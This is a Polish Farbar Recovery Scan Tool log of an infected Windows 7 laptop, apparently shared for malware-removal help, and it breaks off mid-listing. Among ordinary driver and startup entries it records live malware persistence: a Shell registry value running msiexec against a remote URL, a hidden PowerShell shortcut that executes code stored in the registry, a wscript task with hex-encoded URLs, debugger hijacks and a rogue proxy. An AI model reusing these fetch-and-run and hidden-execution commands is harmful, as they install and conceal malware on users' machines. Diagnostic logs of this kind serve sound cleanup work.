Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x64) Wersja: 01-05.2019 Uruchomiony przez user (administrator) USER-KOMPUTER (Dell Inc. Inspiron 3542) (02-05-2019 09:00:01) Uruchomiony z C:\Users\user\Desktop Załadowane profile: user (Dostępne profile: user) Platform: Windows 7 Professional Service Pack 1 (X64) Język: Polski (Polska) Internet Explorer Wersja 11 (Domyślna przeglądarka: "C:\Program Files (x86)\Eastness\Application\chrome.exe" "%1") Tryb startu: Normal Instrukcja obsługi Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Procesy (filtrowane) ================= (Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.) (Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (Brother Industries, Ltd.) [Brak podpisu cyfrowego] C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe (Brother Industries, Ltd.) [Brak podpisu cyfrowego] C:\Program Files (x86)\Browny02\BrYNSvc.exe (Brother Industries, Ltd.) [Brak podpisu cyfrowego] C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe (Brother Industries, Ltd.) [Brak podpisu cyfrowego] C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe (Filseclab Corporation -> Filseclab Corporation Limited) C:\Program Files (x86)\ScreenShot\SSSvc.exe (Huawei Technologies Co., Ltd. -> ) [Brak podpisu cyfrowego] C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe (Huawei Technologies Co.,Ltd. -> ) C:\ProgramData\MobileBrServ\mbbService.exe (Intel Corporation - Intel® Rapid Storage Technology -> Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe (Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe (Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxHK.exe (Intel(R) USB eXtensible Host Controller Drivers -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 3.1 eXtensible Host Controller Driver\Application\iusb3mon.exe (Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (NVIDIA Corporation -> ) C:\Users\user\AppData\Local\NVIDIA\NvBackend\Packages\0000da7e\DAO.26250651.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe (Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe ==================== Rejestr (filtrowane) =========================== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.) HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-30] (Intel Corporation - Intel® Rapid Storage Technology -> Intel Corporation) HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2398776 2016-06-15] (NVIDIA Corporation -> NVIDIA Corporation) HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\nvspcap64.dll [1767760 2016-06-15] (NVIDIA Corporation PE Sign v2014 -> NVIDIA Corporation) [Brak podpisu cyfrowego] HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [9192960 2017-03-30] (Realtek Semiconductor Corp. -> Realtek Semiconductor) HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1484288 2017-03-30] (Realtek Semiconductor Corp. -> Realtek Semiconductor) HKLM\...\Run: [RtHDVBg_PushButton] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1484288 2017-03-30] (Realtek Semiconductor Corp. -> Realtek Semiconductor) HKLM\...\Run: [SynTPEnh] => %ProgramFiles%\%SynaProgDir%\SynTPEnh.exe HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 3.1 eXtensible Host Controller Driver\Application\iusb3mon.exe [299520 2016-12-21] (Intel(R) USB eXtensible Host Controller Drivers -> Intel Corporation) HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation) HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [139776 2016-02-03] (Brother Industries, Ltd.) [Brak podpisu cyfrowego] HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [3076096 2012-06-06] (Brother Industries, Ltd.) [Brak podpisu cyfrowego] HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\Run: [background_fault] => C:\Users\user\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-27] (AVAST Software s.r.o. -> AVAST Software) <==== UWAGA HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\Run: [Chromium] => "c:\users\user\appdata\local\chromium\application\chrome.exe" --auto-launch-at-startup --profile-directory=Default --restore-last-session HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj1SMdQWFUM1OTNSMdk8MTJSNkI1FdRWFUVWMWNWF8E8MH== /q <==== UWAGA HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\MountPoints2: E - E:\HiSuiteDownLoader.exe HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\MountPoints2: {0c381122-ad2b-11e8-a4de-4cbb584b2450} - E:\HiSuiteDownLoader.exe HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\MountPoints2: {0c38112d-ad2b-11e8-a4de-4cbb584b2450} - E:\HiSuiteDownLoader.exe HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\MountPoints2: {22447662-0d7b-11e7-92ea-4cbb584b2450} - E:\AutoRun.exe HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\MountPoints2: {47c20b95-c3bb-11e8-abb6-4cbb584b2450} - F:\HiSuiteDownLoader.exe HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\MountPoints2: {62717a59-ab54-11e7-92b8-4cbb584b2450} - E:\AutoRun.exe HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\MountPoints2: {9f990d6e-5eda-11e9-afbd-4cbb584b2450} - E:\HiSuiteDownLoader.exe HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\MountPoints2: {a6f5b12a-54ea-11e8-af04-4cbb584b2450} - E:\HiSuiteDownLoader.exe HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\MountPoints2: {ccbff85e-2798-11e9-81c5-4cbb584b2450} - E:\HiSuiteDownLoader.exe HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\MountPoints2: {ccbff866-2798-11e9-81c5-4cbb584b2450} - E:\HiSuiteDownLoader.exe HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Bubbles.scr [899584 2010-11-21] (Microsoft Windows -> Microsoft Corporation) HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.96\Installer\chrmstp.exe [2017-05-03] (Google Inc -> Google Inc.) AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [170360 2017-04-01] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [148016 2017-04-01] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] Startup: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iexplorer.lnk [2019-02-20] ShortcutAndArgument: iexplorer.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe => -W Hidden -Exec -nop $t=Get-ItemProperty -Path 'HKCU:\Software\Classes\mssccfile' -Name t;IEX $t.t; ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {0B84AAC8-5B6E-49AC-8B80-40E16AB32FC3} - System32\Tasks\AVG\Overseer => C:\Program Files\Common Files\AVG\Overseer\overseer.exe [2408496 2019-04-03] (AVG Technologies USA, Inc. -> AVG Technologies CZ, s.r.o.) Task: {11E8C9A5-AC4C-481B-B63E-BE0326998CFC} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-04-11] (Adobe Inc. -> Adobe) Task: {22426DDF-860B-4DA5-8FAB-20D09BEBA97F} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_171_pepper.exe [1452600 2019-04-11] (Adobe Inc. -> Adobe) Task: {29CDBE1B-81AF-4912-ADBE-DBC22D72ADEB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2017-03-16] (Google Inc -> Google Inc.) Task: {360DB563-BAE3-40FB-9C57-6331F434EE84} - System32\Tasks\AvastUpdateTaskMachineUA => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe Task: {4977A195-F738-45C3-965C-EF57D365B924} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [2380088 2019-04-03] (AVAST Software s.r.o. -> AVAST Software) Task: {4DC92DF3-8107-421B-ADCA-36B2BAFDBF5B} - System32\Tasks\EOSv3 Scheduler onLogOn => C:\Users\user\Desktop\Downloads\esetonlinescanner_plk (1).exe [7668344 2019-01-12] (ESET, spol. s r.o. -> ESET spol. s r.o.) Task: {6FC838CB-3E2C-4F1E-9447-4AFDA1CE5A69} - System32\Tasks\EOSv3 Scheduler onTime => C:\Users\user\Desktop\Downloads\esetonlinescanner_plk (1).exe [7668344 2019-01-12] (ESET, spol. s r.o. -> ESET spol. s r.o.) Task: {722535D1-3A59-4CF0-8959-11A69E305466} - System32\Tasks\AvastUpdateTaskMachineCore => C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe Task: {76641C0C-80E3-426C-B9CC-42DC1A0E2A11} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe Task: {A2823A90-B58E-4522-9B41-9B70648660C5} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [154440 2017-03-16] (Google Inc -> Google Inc.) Task: {ADAF04DB-C932-40AC-8AE6-D7F35E4F97F1} - System32\Tasks\{10AADE66-C534-454D-A03C-063B83E53749} => C:\Windows\system32\pcalua.exe -a "C:\Users\user\Downloads\Windows Media Player 11 [1].exe" -d C:\Users\user\Downloads Task: {BFD671CA-1D53-4AF1-A286-130BB21765C0} - System32\Tasks\Chromium lerim => "wscript.exe" "C:\ProgramData\{D8901DF3-52D2-9735-D414-09774E5682B9}\dema.txt" "68747470733a2f2f6b6174756e61712e636f6d" "433a5c50726f6772616d446174615c7b44383930314446332d353244322d393733352d443431342d3039373734453536383242397d5c6d616e696e69" "433a5c50726f6772616d446174615c7b44383930314446332d353244322d393733352d (dane wartości zawierają 84 znaków więcej). <==== UWAGA Task: {C5ED2FE8-B8E2-43DF-B349-F046117F1185} - System32\Tasks\Opera scheduled Autoupdate 1489764596 => C:\Program Files\Opera\launcher.exe [1492568 2019-04-26] (Opera Software AS -> Opera Software) Task: {DD3FAE7F-7209-4D6C-8E39-EE0BBBC1232F} - System32\Tasks\{6D3767A9-9E41-441F-B89A-DAB6E5E93AB4} => C:\Windows\system32\pcalua.exe -a C:\Users\user\Downloads\wmp11-windowsxp-x86-PL-PL.exe -d C:\Users\user\Downloads Task: {E33A7C3B-A40C-4A31-8DAA-2633531B5E13} - System32\Tasks\{18BD455D-7CFB-458E-97AF-4531E3CD49C4} => C:\Program Files (x86)\VideoLAN\VLC\vlc.exe [145328 2017-05-24] (VideoLAN -> VideoLAN) Task: {FA55F0A2-083D-42F8-841A-F12D733065CE} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1195544 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) ==================== Internet (filtrowane) ==================== (Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.) ProxyEnable: [S-1-5-19] => Proxy [funkcja włączona] ProxyServer: [S-1-5-19] => 127.0.0.1:8080 ProxyEnable: [S-1-5-20] => Proxy [funkcja włączona] ProxyServer: [S-1-5-20] => 127.0.0.1:8080 ProxyEnable: [S-1-5-21-1515640166-2867340543-1920175967-1000] => Proxy [funkcja włączona] ProxyServer: [S-1-5-21-1515640166-2867340543-1920175967-1000] => 127.0.0.1:8080 Hosts: W pliku Hosts jest więcej niż jedno wejście. Sprawdź sekcję Hosts w Addition.txt Tcpip\Parameters: [DhcpNameServer] 192.168.8.1 Tcpip\..\Interfaces\{6FAE1BC3-C8BF-4D2F-86E3-451058660D46}: [DhcpNameServer] 192.168.8.1 192.168.8.1 Tcpip\..\Interfaces\{7B590DE9-D3CC-43BA-9BDF-F62F6F6874AA}: [DhcpNameServer] 192.168.8.1 Tcpip\..\Interfaces\{9AE3578D-931C-488F-97DC-E3916685A36A}: [DhcpNameServer] 192.168.8.1 Tcpip\..\Interfaces\{A1872C2A-BADB-48F4-813A-210ACB641FEC}: [DhcpNameServer] 192.168.8.1 192.168.8.1 ManualProxies: 1127.0.0.1:8080 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM -> {e5badea7-e1c2-fbf1-87ac-061d1440d15b} URL = SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM-x32 -> {e5badea7-e1c2-fbf1-87ac-061d1440d15b} URL = SearchScopes: HKU\.DEFAULT -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKU\S-1-5-21-1515640166-2867340543-1920175967-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = BHO: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\program files (x86)\mcafee\SITEAD~1\x64\mcieplg.dll => Brak pliku BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation) Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\program files (x86)\mcafee\SITEAD~1\mcieplg.dll Brak pliku StartMenuInternet: IEXPLORE.EXE - iexplore.exe FireFox: ======== FF Plugin: @microsoft.com/GENUINE -> disabled [Brak pliku] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Brak pliku] FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-30] (Google Inc -> Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-30] (Google Inc -> Google Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-06-29] (Adobe Systems, Incorporated -> Adobe Systems Inc.) Chrome: ======= CHR res: Zainfekowany resources.pak (search_engine). Przeinstaluj Chrome. <==== UWAGA CHR HomePage: Default -> hxxps://www.google.com/ CHR StartupUrls: Default -> "hxxps://www.google.com/" CHR DefaultSearchURL: Default -> hxxp://www.mystarting123.com/search/index.php?z=54320939c4d150bfeed4b3cg7zct2weqag0c7ofedc&q={searchTerms} CHR DefaultSearchKeyword: Default -> mystarting123 CHR Profile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default [2019-04-30] CHR Extension: (Prezentacje) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-03-28] CHR Extension: (Dokumenty) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-03-28] CHR Extension: (Dysk Google) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-03-16] CHR Extension: (YouTube) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-03-16] CHR Extension: (Adobe Acrobat) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2019-03-28] CHR Extension: (Arkusze) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-03-28] CHR Extension: (Dokumenty Google offline) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-03-28] CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-03-28] CHR Extension: (tTab) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oonbcpdabjcggcklopgbdagbfnkhbgbe [2019-03-28] CHR Extension: (Gmail) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-03-16] CHR Extension: (Chrome Media Router) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-03-28] CHR HKLM\...\Chrome\Extension: [oonbcpdabjcggcklopgbdagbfnkhbgbe] - hxxps://clients2.google.com/service/update2/crx CHR HKU\.DEFAULT\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [oonbcpdabjcggcklopgbdagbfnkhbgbe] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [oonbcpdabjcggcklopgbdagbfnkhbgbe] - hxxps://clients2.google.com/service/update2/crx ==================== Usługi (filtrowane) ==================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) R2 3B1FB597; C:\ProgramData\3B1FB597\DCB5EEC9.dll [617984 2019-03-25] () [Brak podpisu cyfrowego] R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [266240 2012-06-05] (Brother Industries, Ltd.) [Brak podpisu cyfrowego] R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1165368 2016-06-15] (NVIDIA Corporation -> NVIDIA Corporation) R2 HuaweiHiSuiteService64.exe; C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe [190784 2018-12-12] (Huawei Technologies Co., Ltd. -> ) [Brak podpisu cyfrowego] S2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-30] (Intel Corporation - Intel® Rapid Storage Technology -> Intel Corporation) R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [344184 2017-01-13] (Intel Corporation - pGFX -> Intel Corporation) R2 Mobile Broadband HL Service; C:\ProgramData\MobileBrServ\mbbservice.exe [242264 2015-09-23] (Huawei Technologies Co.,Ltd. -> ) S2 NPASRE; C:\Users\user\AppData\Local\NPASRE\Snare.dll [830464 2017-05-23] () [Brak podpisu cyfrowego] <==== UWAGA R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1881144 2016-06-15] (NVIDIA Corporation -> NVIDIA Corporation) R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [3634232 2016-06-15] (NVIDIA Corporation -> NVIDIA Corporation) R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [2522680 2016-06-15] (NVIDIA Corporation -> NVIDIA Corporation) R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [324608 2017-03-30] (Realtek Semiconductor Corp. -> Realtek Semiconductor) S4 SNAREA; C:\Users\user\AppData\Local\SNAREA\Snare.dll [826368 2017-05-23] () [Brak podpisu cyfrowego] <==== UWAGA R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation -> Filseclab Corporation Limited) R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [254552 2016-12-07] (Synaptics Incorporated -> Synaptics Incorporated) R2 TermService; C:\ProgramData\smQWqI6f.492\cR8rpo62.58U.dll [115712 2019-03-28] () [Brak podpisu cyfrowego] S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2015-06-10] (Microsoft Windows -> Microsoft Corporation) S2 avast; "C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe" /svc [X] S3 avastm; "C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe" /medsvc [X] S2 McAfee WebAdvisor; "C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe" [X] R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000 ===================== Sterowniki (filtrowane) ====================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) R3 cykbfltrService; C:\Windows\System32\DRIVERS\cykbfltr.sys [19968 2013-09-13] (Microsoft Windows Hardware Compatibility Publisher -> Cypress Semiconductor, Inc.) S3 ew_usbccgpfilter; C:\Windows\System32\DRIVERS\ew_usbccgpfilter.sys [18944 2018-12-12] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.) U5 hw_usbdev; C:\Windows\System32\Drivers\hw_usbdev.sys [116864 2018-12-12] (Microsoft Windows Hardware Compatibility Publisher -> Huawei Technologies Co., Ltd.) R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [31712 2016-08-29] (Intel(R) Rapid Storage Technology -> Intel Corporation) R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [200272 2017-02-14] (Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [28216 2016-06-15] (NVIDIA Corporation -> NVIDIA Corporation) R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [56384 2016-04-14] (NVIDIA Corporation -> NVIDIA Corporation) U3 aswbdisk; Brak ImagePath U3 avgbdisk; Brak ImagePath S3 iSafeKrnlBoot; system32\DRIVERS\iSafeKrnlBoot.sys [X] <==== UWAGA S3 mfesapsn; \??\C:\Program Files\McAfee\WebAdvisor\mfesapsn.sys [X] ==================== NetSvcs (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) ==================== Jeden miesiąc (utworzone) ======== (Załączenie wejścia w fixlist spowoduje przeniesienie pliku/folderu.) 2019-05-02 09:00 - 2019-05-02 09:02 - 000025194 _____ C:\Users\user\Desktop\FRST.txt 2019-05-02 08:59 - 2019-05-02 09:00 - 000000000 ____D C:\FRST 2019-05-02 08:59 - 2019-05-02 08:55 - 002430464 _____ (Farbar) C:\Users\user\Desktop\FRST64.exe 2019-04-30 15:02 - 2019-04-30 15:02 - 000000000 ____D C:\Program Files (x86)\ESET 2019-04-30 15:02 - 2015-04-13 20:16 - 002347384 _____ (ESET) C:\Users\user\Desktop\esetsmartinstaller_plk.exe 2019-04-27 14:41 - 2019-04-27 14:56 - 000000000 ____D C:\Users\user\Desktop\inne 2019-04-16 16:26 - 2019-04-16 16:26 - 377634692 _____ C:\Windows\MEMORY.DMP 2019-04-16 16:26 - 2019-04-16 16:26 - 000307032 _____ C:\Windows\Minidump\041619-13197-01.dmp 2019-04-13 15:13 - 2019-04-13 15:13 - 000001005 _____ C:\Users\Public\Desktop\HiSuite.lnk 2019-04-13 15:13 - 2019-04-13 15:13 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HiSuite 2019-04-13 15:12 - 2019-04-13 15:13 - 000000000 ____D C:\Users\user\AppData\Local\HiSuite 2019-04-13 15:12 - 2019-04-13 15:13 - 000000000 ____D C:\Program Files (x86)\HiSuite 2019-04-13 15:12 - 2018-12-12 12:32 - 000287232 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\hw_quusbnet.sys 2019-04-13 15:12 - 2018-12-12 12:32 - 000226560 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\hw_quusbmdm.sys 2019-04-13 15:12 - 2018-12-12 12:32 - 000127360 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\hw_cdcacm.sys 2019-04-13 15:12 - 2018-12-12 12:32 - 000116864 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\hw_usbdev.sys 2019-04-13 15:12 - 2018-12-12 